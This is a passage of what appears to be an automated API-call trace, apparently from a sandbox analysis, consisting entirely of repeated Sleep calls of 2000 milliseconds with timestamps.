Sleep (dwMilliseconds=0x7d0) [0230.546] Sleep (dwMilliseconds=0x7d0) [0230.547] Sleep (dwMilliseconds=0x7d0) [0230.553] Sleep (dwMilliseconds=0x7d0) [0230.554] Sleep (dwMilliseconds=0x7d0) [0230.559] Sleep (dwMilliseconds=0x7d0) [0230.560] Sleep (dwMilliseconds=0x7d0) [0230.565] Sleep (dwMilliseconds=0x7d0) [0230.567] Sleep (dwMilliseconds=0x7d0) [0230.572] Sleep (dwMilliseconds=0x7d0) [0230.574] Sleep (dwMilliseconds=0x7d0) [0230.575] Sleep (dwMilliseconds=0x7d0) [0230.580] Sleep (dwMilliseconds=0x7d0) [0230.582] Sleep (dwMilliseconds=0x7d0) [0230.589] Sleep (dwMilliseconds=0x7d0) [0230.595] Sleep (dwMilliseconds=0x7d0) [0230.597] Sleep (dwMilliseconds=0x7d0) [0230.603] Sleep (dwMilliseconds=0x7d0) [0230.610] Sleep (dwMilliseconds=0x7d0) [0230.617] Sleep (dwMilliseconds=0x7d0) [0230.618] Sleep (dwMilliseconds=0x7d0) [0230.622] Sleep (dwMilliseconds=0x7d0) [0230.624] Sleep (dwMilliseconds=0x7d0) [0230.626] Sleep (dwMilliseconds=0x7d0) [0230.631] Sleep (dwMilliseconds=0x7d0) [0230.633] Sleep (dwMilliseconds=0x7d0) [0230.639] Sleep (dwMilliseconds=0x7d0) [0230.640] Sleep (dwMilliseconds=0x7d0) [0230.646] Sleep (dwMilliseconds=0x7d0) [0230.652] Sleep (dwMilliseconds=0x7d0) [0230.654] Sleep (dwMilliseconds=0x7d0) [0230.659] Sleep (dwMilliseconds=0x7d0) [0230.661] Sleep (dwMilliseconds=0x7d0) [0230.667] Sleep (dwMilliseconds=0x7d0) [0230.669] Sleep (dwMilliseconds=0x7d0) [0230.673] Sleep (dwMilliseconds=0x7d0) [0230.680] Sleep (dwMilliseconds=0x7d0) [0230.682] Sleep (dwMilliseconds=0x7d0) [0230.689] Sleep (dwMilliseconds=0x7d0) [0230.696] Sleep (dwMilliseconds=0x7d0) [0230.703] Sleep (dwMilliseconds=0x7d0) [0230.704] Sleep (dwMilliseconds=0x7d0) [0230.710] Sleep (dwMilliseconds=0x7d0) [0230.714] Sleep (dwMilliseconds=0x7d0) [0230.717] Sleep (dwMilliseconds=0x7d0) [0230.724] Sleep (dwMilliseconds=0x7d0) [0230.731] Sleep (dwMilliseconds=0x7d0) [0230.737] Sleep (dwMilliseconds=0x7d0) [0230.744] Sleep (dwMilliseconds=0x7d0) [0230.751] Sleep (dwMilliseconds=0x7d0) [0230.752] Sleep (dwMilliseconds=0x7d0) [0230.758] Sleep (dwMilliseconds=0x7d0) [0230.760] Sleep (dwMilliseconds=0x7d0) [0230.765] Sleep (dwMilliseconds=0x7d0) [0230.772] Sleep (dwMilliseconds=0x7d0) [0230.773] Sleep (dwMilliseconds=0x7d0) [0230.778] Sleep (dwMilliseconds=0x7d0) [0230.780] Sleep (dwMilliseconds=0x7d0) [0230.785] Sleep (dwMilliseconds=0x7d0) [0230.786] Sleep (dwMilliseconds=0x7d0) [0230.794] Sleep (dwMilliseconds=0x7d0) [0230.796] Sleep (dwMilliseconds=0x7d0) [0230.800] Sleep (dwMilliseconds=0x7d0) [0230.807] Sleep (dwMilliseconds=0x7d0) [0230.809] Sleep (dwMilliseconds=0x7d0) [0230.814] Sleep (dwMilliseconds=0x7d0) [0230.821] Sleep (dwMilliseconds=0x7d0) [0230.823] Sleep (dwMilliseconds=0x7d0) [0230.829] Sleep (dwMilliseconds=0x7d0) [0230.830] Sleep (dwMilliseconds=0x7d0) [0230.836] Sleep (dwMilliseconds=0x7d0) [0230.843] Sleep (dwMilliseconds=0x7d0) [0230.844] Sleep (dwMilliseconds=0x7d0) [0230.850] Sleep (dwMilliseconds=0x7d0) [0230.852] Sleep (dwMilliseconds=0x7d0) [0230.854] Sleep (dwMilliseconds=0x7d0) [0230.858] Sleep (dwMilliseconds=0x7d0) [0230.864] Sleep (dwMilliseconds=0x7d0) [0230.866] Sleep (dwMilliseconds=0x7d0) [0230.871] Sleep (dwMilliseconds=0x7d0) [0230.873] Sleep (dwMilliseconds=0x7d0) [0230.879] Sleep (dwMilliseconds=0x7d0) [0230.889] Sleep (dwMilliseconds=0x7d0) [0230.895] Sleep (dwMilliseconds=0x7d0) [0230.899] Sleep (dwMilliseconds=0x7d0) [0230.902] Sleep (dwMilliseconds=0x7d0) [0230.905] Sleep (dwMilliseconds=0x7d0) [0230.911] Sleep (dwMilliseconds=0x7d0) [0230.912] Sleep (dwMilliseconds=0x7d0) [0230.948] Sleep (dwMilliseconds=0x7d0) [0230.955] Sleep (dwMilliseconds=0x7d0) [0230.957] Sleep (dwMilliseconds=0x7d0) [0230.963] Sleep (dwMilliseconds=0x7d0) [0230.970] Sleep (dwMilliseconds=0x7d0) [0230.971] Sleep (dwMilliseconds=0x7d0) [0230.974] Sleep (dwMilliseconds=0x7d0) [0230.977] Sleep (dwMilliseconds=0x7d0) [0230.990] Sleep (dwMilliseconds=0x7d0) [0230.991] Sleep (dwMilliseconds=0x7d0) [0230.997] Sleep (dwMilliseconds=0x7d0) [0230.999] Sleep (dwMilliseconds=0x7d0) [0231.006] Sleep (dwMilliseconds=0x7d0) [0231.013] Sleep (dwMilliseconds=0x7d0) [0231.014] Sleep (dwMilliseconds=0x7d0) [0231.020] Sleep (dwMilliseconds=0x7d0) [0231.026] Sleep (dwMilliseconds=0x7d0) [0231.030] Sleep (dwMilliseconds=0x7d0) [0231.031] Sleep (dwMilliseconds=0x7d0) [0231.037] Sleep (dwMilliseconds=0x7d0) [0231.038] Sleep (dwMilliseconds=0x7d0) [0231.045] Sleep (dwMilliseconds=0x7d0) [0231.051] Sleep (dwMilliseconds=0x7d0) [0231.053] Sleep (dwMilliseconds=0x7d0) [0231.059] Sleep (dwMilliseconds=0x7d0) [0231.060] Sleep (dwMilliseconds=0x7d0) [0231.066] Sleep (dwMilliseconds=0x7d0) [0231.071] Sleep (dwMilliseconds=0x7d0) [0231.074] Sleep (dwMilliseconds=0x7d0) [0231.075] Sleep (dwMilliseconds=0x7d0) [0231.082] Sleep (dwMilliseconds=0x7d0) [0231.084] Sleep (dwMilliseconds=0x7d0) [0231.090] Sleep (dwMilliseconds=0x7d0) [0231.097] Sleep (dwMilliseconds=0x7d0) [0231.099] Sleep (dwMilliseconds=0x7d0) [0231.104] Sleep (dwMilliseconds=0x7d0) [0231.106] Sleep (dwMilliseconds=0x7d0) [0231.112] Sleep (dwMilliseconds=0x7d0) [0231.114] Sleep (dwMilliseconds=0x7d0) [0231.117] Sleep (dwMilliseconds=0x7d0) [0231.120] Sleep (dwMilliseconds=0x7d0) [0231.127] Sleep (dwMilliseconds=0x7d0) [0231.128] Sleep (dwMilliseconds=0x7d0) [0231.135] Sleep (dwMilliseconds=0x7d0) [0231.141] Sleep (dwMilliseconds=0x7d0) [0231.142] Sleep (dwMilliseconds=0x7d0) [0231.148] Sleep (dwMilliseconds=0x7d0) [0231.149] Sleep (dwMilliseconds=0x7d0) [0231.155] Sleep (dwMilliseconds=0x7d0) [0231.157] Sleep (dwMilliseconds=0x7d0) [0231.163] Sleep (dwMilliseconds=0x7d0) [0231.165] Sleep (dwMilliseconds=0x7d0) [0231.166] Sleep (dwMilliseconds=0x7d0) [0231.173] Sleep (dwMilliseconds=0x7d0) [0231.185] Sleep (dwMilliseconds=0x7d0) [0231.194] Sleep (dwMilliseconds=0x7d0) [0231.197] Sleep (dwMilliseconds=0x7d0) [0231.208] Sleep (dwMilliseconds=0x7d0) [0231.209] Sleep (dwMilliseconds=0x7d0) [0231.216] Sleep (dwMilliseconds=0x7d0) [0231.217] Sleep (dwMilliseconds=0x7d0) [0231.223] Sleep (dwMilliseconds=0x7d0) [0231.224] Sleep (dwMilliseconds=0x7d0) [0231.227] Sleep (dwMilliseconds=0x7d0) [0231.231] Sleep (dwMilliseconds=0x7d0) [0231.233] Sleep (dwMilliseconds=0x7d0) [0231.240] Sleep (dwMilliseconds=0x7d0) [0231.247] Sleep (dwMilliseconds=0x7d0) [0231.248] Sleep (dwMilliseconds=0x7d0) [0231.254] Sleep (dwMilliseconds=0x7d0) [0231.256] Sleep (dwMilliseconds=0x7d0) [0231.262] Sleep (dwMilliseconds=0x7d0) [0231.263] Sleep (dwMilliseconds=0x7d0) [0231.269] Sleep (dwMilliseconds=0x7d0) [0231.271] Sleep (dwMilliseconds=0x7d0) [0231.273] Sleep (dwMilliseconds=0x7d0) [0231.278] Sleep (dwMilliseconds=0x7d0) [0231.285] Sleep (dwMilliseconds=0x7d0) [0231.287] Sleep (dwMilliseconds=0x7d0) [0231.294] Sleep (dwMilliseconds=0x7d0) [0231.296] Sleep (dwMilliseconds=0x7d0) [0231.302] Sleep (dwMilliseconds=0x7d0) [0231.304] Sleep (dwMilliseconds=0x7d0) [0231.309] Sleep (dwMilliseconds=0x7d0) [0231.311] Sleep (dwMilliseconds=0x7d0) [0231.320] Sleep (dwMilliseconds=0x7d0) [0231.328] Sleep (dwMilliseconds=0x7d0) [0231.330] Sleep (dwMilliseconds=0x7d0) [0231.336] Sleep (dwMilliseconds=0x7d0) [0231.355] Sleep (dwMilliseconds=0x7d0) [0231.357] Sleep (dwMilliseconds=0x7d0) [0231.365] Sleep (dwMilliseconds=0x7d0) [0231.369] Sleep (dwMilliseconds=0x7d0) [0231.377] Sleep (dwMilliseconds=0x7d0) [0231.388] Sleep (dwMilliseconds=0x7d0) [0231.393] Sleep (dwMilliseconds=0x7d0) [0231.412] Sleep (dwMilliseconds=0x7d0) [0231.417] Sleep (dwMilliseconds=0x7d0) [0231.435] Sleep (dwMilliseconds=0x7d0) [0231.437] Sleep (dwMilliseconds=0x7d0) [0231.442] Sleep (dwMilliseconds=0x7d0) [0231.446] Sleep (dwMilliseconds=0x7d0) [0231.456] Sleep (dwMilliseconds=0x7d0) [0231.457] Sleep (dwMilliseconds=0x7d0) [0231.466] Sleep (dwMilliseconds=0x7d0) [0231.469] Sleep (dwMilliseconds=0x7d0) [0231.479] Sleep (dwMilliseconds=0x7d0) [0231.486] Sleep (dwMilliseconds=0x7d0) [0231.488] Sleep (dwMilliseconds=0x7d0) [0231.497] Sleep (dwMilliseconds=0x7d0) [0231.506] Sleep (dwMilliseconds=0x7d0) [0231.513] Sleep (dwMilliseconds=0x7d0) [0231.516] Sleep (dwMilliseconds=0x7d0) [0231.524] Sleep (dwMilliseconds=0x7d0) [0231.525] Sleep (dwMilliseconds=0x7d0) [0231.533] Sleep (dwMilliseconds=0x7d0) [0231.540] Sleep (dwMilliseconds=0x7d0) [0231.544] Sleep (dwMilliseconds=0x7d0) [0231.553] Sleep (dwMilliseconds=0x7d0) [0231.560] Sleep (dwMilliseconds=0x7d0) [0231.563] Sleep (dwMilliseconds=0x7d0) [0231.577] Sleep (dwMilliseconds=0x7d0) [0231.592] Sleep (dwMilliseconds=0x7d0) [0231.594] Sleep (dwMilliseconds=0x7d0) [0231.601] Sleep (dwMilliseconds=0x7d0) [0231.606] Sleep (dwMilliseconds=0x7d0) [0231.613] Sleep (dwMilliseconds=0x7d0) [0231.618] Sleep (dwMilliseconds=0x7d0) [0231.626] Sleep (dwMilliseconds=0x7d0) [0231.628] Sleep (dwMilliseconds=0x7d0) [0231.636] Sleep (dwMilliseconds=0x7d0) [0231.638] Sleep (dwMilliseconds=0x7d0) [0231.645] Sleep (dwMilliseconds=0x7d0) [0231.646] Sleep (dwMilliseconds=0x7d0) [0231.650] Sleep (dwMilliseconds=0x7d0) [0231.653] Sleep (dwMilliseconds=0x7d0) [0231.659] Sleep (dwMilliseconds=0x7d0) [0231.661] Sleep (dwMilliseconds=0x7d0) [0231.667] Sleep (dwMilliseconds=0x7d0) [0231.668] Sleep (dwMilliseconds=0x7d0) [0231.675] Sleep (dwMilliseconds=0x7d0) [0231.677] Sleep (dwMilliseconds=0x7d0) [0231.683] Sleep (dwMilliseconds=0x7d0) [0231.689] Sleep (dwMilliseconds=0x7d0) [0231.691] Sleep (dwMilliseconds=0x7d0) [0231.696] Sleep (dwMilliseconds=0x7d0) [0231.698] Sleep (dwMilliseconds=0x7d0) [0231.699] Sleep (dwMilliseconds=0x7d0) [0231.706] Sleep (dwMilliseconds=0x7d0) [0231.714] Sleep (dwMilliseconds=0x7d0) [0231.715] Sleep (dwMilliseconds=0x7d0) [0231.722] Sleep (dwMilliseconds=0x7d0) [0231.731] Sleep (dwMilliseconds=0x7d0) [0231.732] Sleep (dwMilliseconds=0x7d0) [0231.738] Sleep (dwMilliseconds=0x7d0) [0231.739] Sleep (dwMilliseconds=0x7d0) [0231.741] Sleep (dwMilliseconds=0x7d0) [0231.746] Sleep (dwMilliseconds=0x7d0) [0231.748] Sleep (dwMilliseconds=0x7d0) [0231.754] Sleep (dwMilliseconds=0x7d0) [0231.761] Sleep (dwMilliseconds=0x7d0) [0231.762] Sleep (dwMilliseconds=0x7d0) [0231.768] Sleep (dwMilliseconds=0x7d0) [0231.774] Sleep (dwMilliseconds=0x7d0) [0231.775] Sleep (dwMilliseconds=0x7d0) [0231.818] Sleep (dwMilliseconds=0x7d0) [0231.819] Sleep (dwMilliseconds=0x7d0) [0231.821] Sleep (dwMilliseconds=0x7d0) [0231.826] Sleep (dwMilliseconds=0x7d0) [0231.827] Sleep (dwMilliseconds=0x7d0) [0231.833] Sleep (dwMilliseconds=0x7d0) [0231.839] Sleep (dwMilliseconds=0x7d0) [0231.840] Sleep (dwMilliseconds=0x7d0) [0231.846] Sleep (dwMilliseconds=0x7d0) [0231.848] Sleep (dwMilliseconds=0x7d0) [0231.856] Sleep (dwMilliseconds=0x7d0) [0231.858] Sleep (dwMilliseconds=0x7d0) [0231.864] Sleep (dwMilliseconds=0x7d0) [0231.869] Sleep (dwMilliseconds=0x7d0) [0231.872] Sleep (dwMilliseconds=0x7d0) [0231.879] Sleep (dwMilliseconds=0x7d0) [0231.886] Sleep (dwMilliseconds=0x7d0) [0231.887] Sleep (dwMilliseconds=0x7d0) [0231.893] Sleep (dwMilliseconds=0x7d0) [0231.894] Sleep (dwMilliseconds=0x7d0) [0231.900] Sleep (dwMilliseconds=0x7d0) [0231.907] Sleep (dwMilliseconds=0x7d0) [0231.908] Sleep (dwMilliseconds=0x7d0) [0231.915] Sleep (dwMilliseconds=0x7d0) [0231.916] Sleep (dwMilliseconds=0x7d0) [0231.962] Sleep (dwMilliseconds=0x7d0) [0231.964] Sleep (dwMilliseconds=0x7d0) [0231.971] Sleep (dwMilliseconds=0x7d0) [0231.972] Sleep (dwMilliseconds=0x7d0) [0231.980] Sleep (dwMilliseconds=0x7d0) [0231.988] Sleep (dwMilliseconds=0x7d0) [0231.990] Sleep (dwMilliseconds=0x7d0) [0231.996] Sleep (dwMilliseconds=0x7d0) [0231.998] Sleep (dwMilliseconds=0x7d0) [0231.999] Sleep (dwMilliseconds=0x7d0) [0232.007] Sleep (dwMilliseconds=0x7d0) [0232.008] Sleep (dwMilliseconds=0x7d0) [0232.017] Sleep (dwMilliseconds=0x7d0) [0232.018] Sleep (dwMilliseconds=0x7d0) [0232.024] Sleep (dwMilliseconds=0x7d0) [0232.025] Sleep (dwMilliseconds=0x7d0) [0232.031] Sleep (dwMilliseconds=0x7d0) [0232.032] Sleep (dwMilliseconds=0x7d0) [0232.038] Sleep (dwMilliseconds=0x7d0) [0232.039] Sleep (dwMilliseconds=0x7d0) [0232.042] Sleep (dwMilliseconds=0x7d0) [0232.048] Sleep (dwMilliseconds=0x7d0) [0232.056] Sleep (dwMilliseconds=0x7d0) [0232.058] Sleep (dwMilliseconds=0x7d0) [0232.065] Sleep (dwMilliseconds=0x7d0) [0232.066] Sleep (dwMilliseconds=0x7d0) [0232.074] Sleep (dwMilliseconds=0x7d0) [0232.076] Sleep (dwMilliseconds=0x7d0) [0232.083] Sleep (dwMilliseconds=0x7d0) [0232.088] Sleep (dwMilliseconds=0x7d0) [0232.093] Sleep (dwMilliseconds=0x7d0) [0232.095] Sleep (dwMilliseconds=0x7d0) [0232.103] Sleep (dwMilliseconds=0x7d0) [0232.105] Sleep (dwMilliseconds=0x7d0) [0232.113] Sleep (dwMilliseconds=0x7d0) [0232.116] Sleep (dwMilliseconds=0x7d0) [0232.125] Sleep (dwMilliseconds=0x7d0) [0232.127] Sleep (dwMilliseconds=0x7d0) [0232.132] Sleep (dwMilliseconds=0x7d0) [0232.135] Sleep (dwMilliseconds=0x7d0) [0232.138] Sleep (dwMilliseconds=0x7d0) [0232.140] Sleep (dwMilliseconds=0x7d0) [0232.142] Sleep (dwMilliseconds=0x7d0) [0232.147] Sleep (dwMilliseconds=0x7d0) [0232.148] Sleep (dwMilliseconds=0x7d0) [0232.154] Sleep (dwMilliseconds=0x7d0) [0232.161] Sleep (dwMilliseconds=0x7d0) [0232.162] Sleep (dwMilliseconds=0x7d0) [0232.168] Sleep (dwMilliseconds=0x7d0) [0232.174] Sleep (dwMilliseconds=0x7d0) [0232.176] Sleep (dwMilliseconds=0x7d0) [0232.183] Sleep (dwMilliseconds=0x7d0) [0232.184] Sleep (dwMilliseconds=0x7d0) [0232.189] Sleep (dwMilliseconds=0x7d0) [0232.190] Sleep (dwMilliseconds=0x7d0) [0232.195] Sleep (dwMilliseconds=0x7d0) [0232.197] Sleep (dwMilliseconds=0x7d0) [0232.202] Sleep (dwMilliseconds=0x7d0) [0232.208] Sleep (dwMilliseconds=0x7d0) [0232.209] Sleep (dwMilliseconds=0x7d0) [0232.214] Sleep (dwMilliseconds=0x7d0) [0232.216] Sleep (dwMilliseconds=0x7d0) [0232.222] Sleep (dwMilliseconds=0x7d0) [0232.223] Sleep (dwMilliseconds=0x7d0) [0232.228] Sleep (dwMilliseconds=0x7d0) [0232.235] Sleep (dwMilliseconds=0x7d0) [0232.236] Sleep (dwMilliseconds=0x7d0) [0232.242] Sleep (dwMilliseconds=0x7d0) [0232.243] Sleep (dwMilliseconds=0x7d0) [0232.250] Sleep (dwMilliseconds=0x7d0) [0232.251] Sleep (dwMilliseconds=0x7d0) [0232.257] Sleep (dwMilliseconds=0x7d0) [0232.258] Sleep (dwMilliseconds=0x7d0) [0232.264] Sleep (dwMilliseconds=0x7d0) [0232.265] Sleep (dwMilliseconds=0x7d0) [0232.271] Sleep (dwMilliseconds=0x7d0) [0232.272] Sleep (dwMilliseconds=0x7d0) [0232.275] Sleep (dwMilliseconds=0x7d0) [0232.278] Sleep (dwMilliseconds=0x7d0) [0232.279] Sleep (dwMilliseconds=0x7d0) [0232.284] Sleep (dwMilliseconds=0x7d0) [0232.286] Sleep (dwMilliseconds=0x7d0) [0232.293] Sleep (dwMilliseconds=0x7d0) [0232.298] Sleep (dwMilliseconds=0x7d0) [0232.300] Sleep (dwMilliseconds=0x7d0) [0232.305] Sleep (dwMilliseconds=0x7d0) [0232.306] Sleep (dwMilliseconds=0x7d0) [0232.311] Sleep (dwMilliseconds=0x7d0) [0232.319] Sleep (dwMilliseconds=0x7d0) [0232.322] Sleep (dwMilliseconds=0x7d0) [0232.326] Sleep (dwMilliseconds=0x7d0) [0232.327] Sleep (dwMilliseconds=0x7d0) [0232.333] Sleep (dwMilliseconds=0x7d0) [0232.335] Sleep (dwMilliseconds=0x7d0) [0232.348] Sleep (dwMilliseconds=0x7d0) [0232.350] Sleep (dwMilliseconds=0x7d0) [0232.356] Sleep (dwMilliseconds=0x7d0) [0232.358] Sleep (dwMilliseconds=0x7d0) [0232.365] Sleep (dwMilliseconds=0x7d0) [0232.368] Sleep (dwMilliseconds=0x7d0) [0232.373] Sleep (dwMilliseconds=0x7d0) [0232.375] Sleep (dwMilliseconds=0x7d0) [0232.382] Sleep (dwMilliseconds=0x7d0) [0232.384] Sleep (dwMilliseconds=0x7d0) [0232.392] Sleep (dwMilliseconds=0x7d0) [0232.394] Sleep (dwMilliseconds=0x7d0) [0232.401] Sleep (dwMilliseconds=0x7d0) [0232.406] Sleep (dwMilliseconds=0x7d0) [0232.413] Sleep (dwMilliseconds=0x7d0) [0232.415] Sleep (dwMilliseconds=0x7d0) [0232.421] Sleep (dwMilliseconds=0x7d0) [0232.427] Sleep (dwMilliseconds=0x7d0) [0232.430] Sleep (dwMilliseconds=0x7d0) [0232.432] Sleep (dwMilliseconds=0x7d0) [0232.435] Sleep (dwMilliseconds=0x7d0) [0232.437] Sleep (dwMilliseconds=0x7d0) [0232.445] Sleep (dwMilliseconds=0x7d0) [0232.446] Sleep (dwMilliseconds=0x7d0) [0232.452] Sleep (dwMilliseconds=0x7d0) [0232.453] Sleep (dwMilliseconds=0x7d0) [0232.458] Sleep (dwMilliseconds=0x7d0) [0232.459] Sleep (dwMilliseconds=0x7d0) [0232.465] Sleep (dwMilliseconds=0x7d0) [0232.472] Sleep (dwMilliseconds=0x7d0) [0232.473] Sleep (dwMilliseconds=0x7d0) [0232.479] Sleep (dwMilliseconds=0x7d0) [0232.480] Sleep (dwMilliseconds=0x7d0) [0232.485] Sleep (dwMilliseconds=0x7d0) [0232.487] Sleep (dwMilliseconds=0x7d0) [0232.492] Sleep (dwMilliseconds=0x7d0) [0232.493] Sleep (dwMilliseconds=0x7d0) [0232.498] Sleep (dwMilliseconds=0x7d0) [0232.500] Sleep (dwMilliseconds=0x7d0) [0232.505] Sleep (dwMilliseconds=0x7d0) [0232.507] Sleep (dwMilliseconds=0x7d0) [0232.512] Sleep (dwMilliseconds=0x7d0) [0232.513] Sleep (dwMilliseconds=0x7d0) [0232.518] Sleep (dwMilliseconds=0x7d0) [0232.520] Sleep (dwMilliseconds=0x7d0) [0232.525] Sleep (dwMilliseconds=0x7d0) [0232.526] Sleep (dwMilliseconds=0x7d0) [0232.528] Sleep (dwMilliseconds=0x7d0) [0232.532] Sleep (dwMilliseconds=0x7d0) [0232.538] Sleep (dwMilliseconds=0x7d0) [0232.539] Sleep (dwMilliseconds=0x7d0) [0232.544] Sleep (dwMilliseconds=0x7d0) [0232.546] Sleep (dwMilliseconds=0x7d0) [0232.551] Sleep (dwMilliseconds=0x7d0) [0232.559] Sleep (dwMilliseconds=0x7d0) [0232.566] Sleep (dwMilliseconds=0x7d0) [0232.567] Sleep (dwMilliseconds=0x7d0) [0232.573] Sleep (dwMilliseconds=0x7d0) [0232.574] Sleep (dwMilliseconds=0x7d0) [0232.580] Sleep (dwMilliseconds=0x7d0) [0232.582] Sleep (dwMilliseconds=0x7d0) [0232.587] Sleep (dwMilliseconds=0x7d0) [0232.588] Sleep (dwMilliseconds=0x7d0) [0232.594] Sleep (dwMilliseconds=0x7d0) [0232.596] Sleep (dwMilliseconds=0x7d0) [0232.601] Sleep (dwMilliseconds=0x7d0) [0232.603] Sleep (dwMilliseconds=0x7d0) [0232.608] Sleep (dwMilliseconds=0x7d0) [0232.609] Sleep (dwMilliseconds=0x7d0) [0232.616] Sleep (dwMilliseconds=0x7d0) [0232.620] Sleep (dwMilliseconds=0x7d0) [0232.622] Sleep (dwMilliseconds=0x7d0) [0232.624] Sleep (dwMilliseconds=0x7d0) [0232.629] Sleep (dwMilliseconds=0x7d0) [0232.635] Sleep (dwMilliseconds=0x7d0) [0232.637] Sleep (dwMilliseconds=0x7d0) [0232.642] Sleep (dwMilliseconds=0x7d0) [0232.644] Sleep (dwMilliseconds=0x7d0) [0232.649] Sleep (dwMilliseconds=0x7d0) [0232.651] Sleep (dwMilliseconds=0x7d0) [0232.657] Sleep (dwMilliseconds=0x7d0) [0232.678] Sleep (dwMilliseconds=0x7d0) [0232.746] Sleep (dwMilliseconds=0x7d0) [0232.747] Sleep (dwMilliseconds=0x7d0) [0232.753] Sleep (dwMilliseconds=0x7d0) [0232.760] Sleep (dwMilliseconds=0x7d0) [0232.761] Sleep (dwMilliseconds=0x7d0) [0232.768] Sleep (dwMilliseconds=0x7d0) [0232.770] Sleep (dwMilliseconds=0x7d0) [0232.776] Sleep (dwMilliseconds=0x7d0) [0232.777] Sleep (dwMilliseconds=0x7d0) [0232.783] Sleep (dwMilliseconds=0x7d0) [0232.785] Sleep (dwMilliseconds=0x7d0) [0232.790] Sleep (dwMilliseconds=0x7d0) [0232.792] Sleep (dwMilliseconds=0x7d0) [0232.799] Sleep (dwMilliseconds=0x7d0) [0232.800] Sleep (dwMilliseconds=0x7d0) [0232.805] Sleep (dwMilliseconds=0x7d0) [0232.807] Sleep (dwMilliseconds=0x7d0) [0232.812] Sleep (dwMilliseconds=0x7d0) [0232.819] Sleep (dwMilliseconds=0x7d0) [0232.823] Sleep (dwMilliseconds=0x7d0) [0232.833] Sleep (dwMilliseconds=0x7d0) [0232.836] Sleep (dwMilliseconds=0x7d0) [0232.843] Sleep (dwMilliseconds=0x7d0) [0232.845] Sleep (dwMilliseconds=0x7d0) [0232.852] Sleep (dwMilliseconds=0x7d0) [0232.854] Sleep (dwMilliseconds=0x7d0) [0232.861] Sleep (dwMilliseconds=0x7d0) [0232.871] Sleep (dwMilliseconds=0x7d0) [0232.872] Sleep (dwMilliseconds=0x7d0) [0232.880] Sleep (dwMilliseconds=0x7d0) [0232.889] Sleep (dwMilliseconds=0x7d0) [0232.891] Sleep (dwMilliseconds=0x7d0) [0232.900] Sleep (dwMilliseconds=0x7d0) [0232.908] Sleep (dwMilliseconds=0x7d0) [0232.982] Sleep (dwMilliseconds=0x7d0) [0232.991] Sleep (dwMilliseconds=0x7d0) [0232.993] Sleep (dwMilliseconds=0x7d0) [0233.000] Sleep (dwMilliseconds=0x7d0) [0233.001] Sleep (dwMilliseconds=0x7d0) [0233.009] Sleep (dwMilliseconds=0x7d0) [0233.010] Sleep (dwMilliseconds=0x7d0) [0233.017] Sleep (dwMilliseconds=0x7d0) [0233.024] Sleep (dwMilliseconds=0x7d0) [0233.032] Sleep (dwMilliseconds=0x7d0) [0233.033] Sleep (dwMilliseconds=0x7d0) [0233.039] Sleep (dwMilliseconds=0x7d0) [0233.041] Sleep (dwMilliseconds=0x7d0) [0233.049] Sleep (dwMilliseconds=0x7d0) [0233.051] Sleep (dwMilliseconds=0x7d0) [0233.056] Sleep (dwMilliseconds=0x7d0) [0233.063] Sleep (dwMilliseconds=0x7d0) [0233.064] Sleep (dwMilliseconds=0x7d0) [0233.070] Sleep (dwMilliseconds=0x7d0) [0233.077] Sleep (dwMilliseconds=0x7d0) [0233.079] Sleep (dwMilliseconds=0x7d0) [0233.085] Sleep (dwMilliseconds=0x7d0) [0233.086] Sleep (dwMilliseconds=0x7d0) [0233.092] Sleep (dwMilliseconds=0x7d0) [0233.094] Sleep (dwMilliseconds=0x7d0) [0233.100] Sleep (dwMilliseconds=0x7d0) [0233.102] Sleep (dwMilliseconds=0x7d0) [0233.103] Sleep (dwMilliseconds=0x7d0) [0233.112] Sleep (dwMilliseconds=0x7d0) [0233.113] Sleep (dwMilliseconds=0x7d0) [0233.119] Sleep (dwMilliseconds=0x7d0) [0233.125] Sleep (dwMilliseconds=0x7d0) [0233.127] Sleep (dwMilliseconds=0x7d0) [0233.133] Sleep (dwMilliseconds=0x7d0) [0233.134] Sleep (dwMilliseconds=0x7d0) [0233.141] Sleep (dwMilliseconds=0x7d0) [0233.146] Sleep (dwMilliseconds=0x7d0) [0233.148] Sleep (dwMilliseconds=0x7d0) [0233.150] Sleep (dwMilliseconds=0x7d0) [0233.154] Sleep (dwMilliseconds=0x7d0) [0233.155] Sleep (dwMilliseconds=0x7d0) [0233.162] Sleep (dwMilliseconds=0x7d0) [0233.163] Sleep (dwMilliseconds=0x7d0) [0233.169] Sleep (dwMilliseconds=0x7d0) [0233.170] Sleep (dwMilliseconds=0x7d0) [0233.202] Sleep (dwMilliseconds=0x7d0) [0233.204] Sleep (dwMilliseconds=0x7d0) [0233.210] Sleep (dwMilliseconds=0x7d0) [0233.211] Sleep (dwMilliseconds=0x7d0) [0233.218] Sleep (dwMilliseconds=0x7d0) [0233.220] Sleep (dwMilliseconds=0x7d0) [0233.227] Sleep (dwMilliseconds=0x7d0) [0233.228] Sleep (dwMilliseconds=0x7d0) [0233.237] Sleep (dwMilliseconds=0x7d0) [0233.243] Sleep (dwMilliseconds=0x7d0) [0233.245] Sleep (dwMilliseconds=0x7d0) [0233.250] Sleep (dwMilliseconds=0x7d0) [0233.251] Sleep (dwMilliseconds=0x7d0) [0233.258] Sleep (dwMilliseconds=0x7d0) [0233.259] Sleep (dwMilliseconds=0x7d0) [0233.265] Sleep (dwMilliseconds=0x7d0) [0233.267] Sleep (dwMilliseconds=0x7d0) [0233.271] Sleep (dwMilliseconds=0x7d0) [0233.275] Sleep (dwMilliseconds=0x7d0) [0233.276] Sleep (dwMilliseconds=0x7d0) [0233.281] Sleep (dwMilliseconds=0x7d0) [0233.289] Sleep (dwMilliseconds=0x7d0) [0233.296] Sleep (dwMilliseconds=0x7d0) [0233.297] Sleep (dwMilliseconds=0x7d0) [0233.304] Sleep (dwMilliseconds=0x7d0) [0233.305] Sleep (dwMilliseconds=0x7d0) [0233.311] Sleep (dwMilliseconds=0x7d0) [0233.335] Sleep (dwMilliseconds=0x7d0) [0233.348] Sleep (dwMilliseconds=0x7d0) [0233.353] Sleep (dwMilliseconds=0x7d0) [0233.354] Sleep (dwMilliseconds=0x7d0) [0233.360] Sleep (dwMilliseconds=0x7d0) [0233.363] Sleep (dwMilliseconds=0x7d0) [0233.371] Sleep (dwMilliseconds=0x7d0) [0233.372] Sleep (dwMilliseconds=0x7d0) [0233.378] Sleep (dwMilliseconds=0x7d0) [0233.379] Sleep (dwMilliseconds=0x7d0) [0233.386] Sleep (dwMilliseconds=0x7d0) [0233.392] Sleep (dwMilliseconds=0x7d0) [0233.396] Sleep (dwMilliseconds=0x7d0) [0233.401] Sleep (dwMilliseconds=0x7d0) [0233.407] Sleep (dwMilliseconds=0x7d0) [0233.408] Sleep (dwMilliseconds=0x7d0) 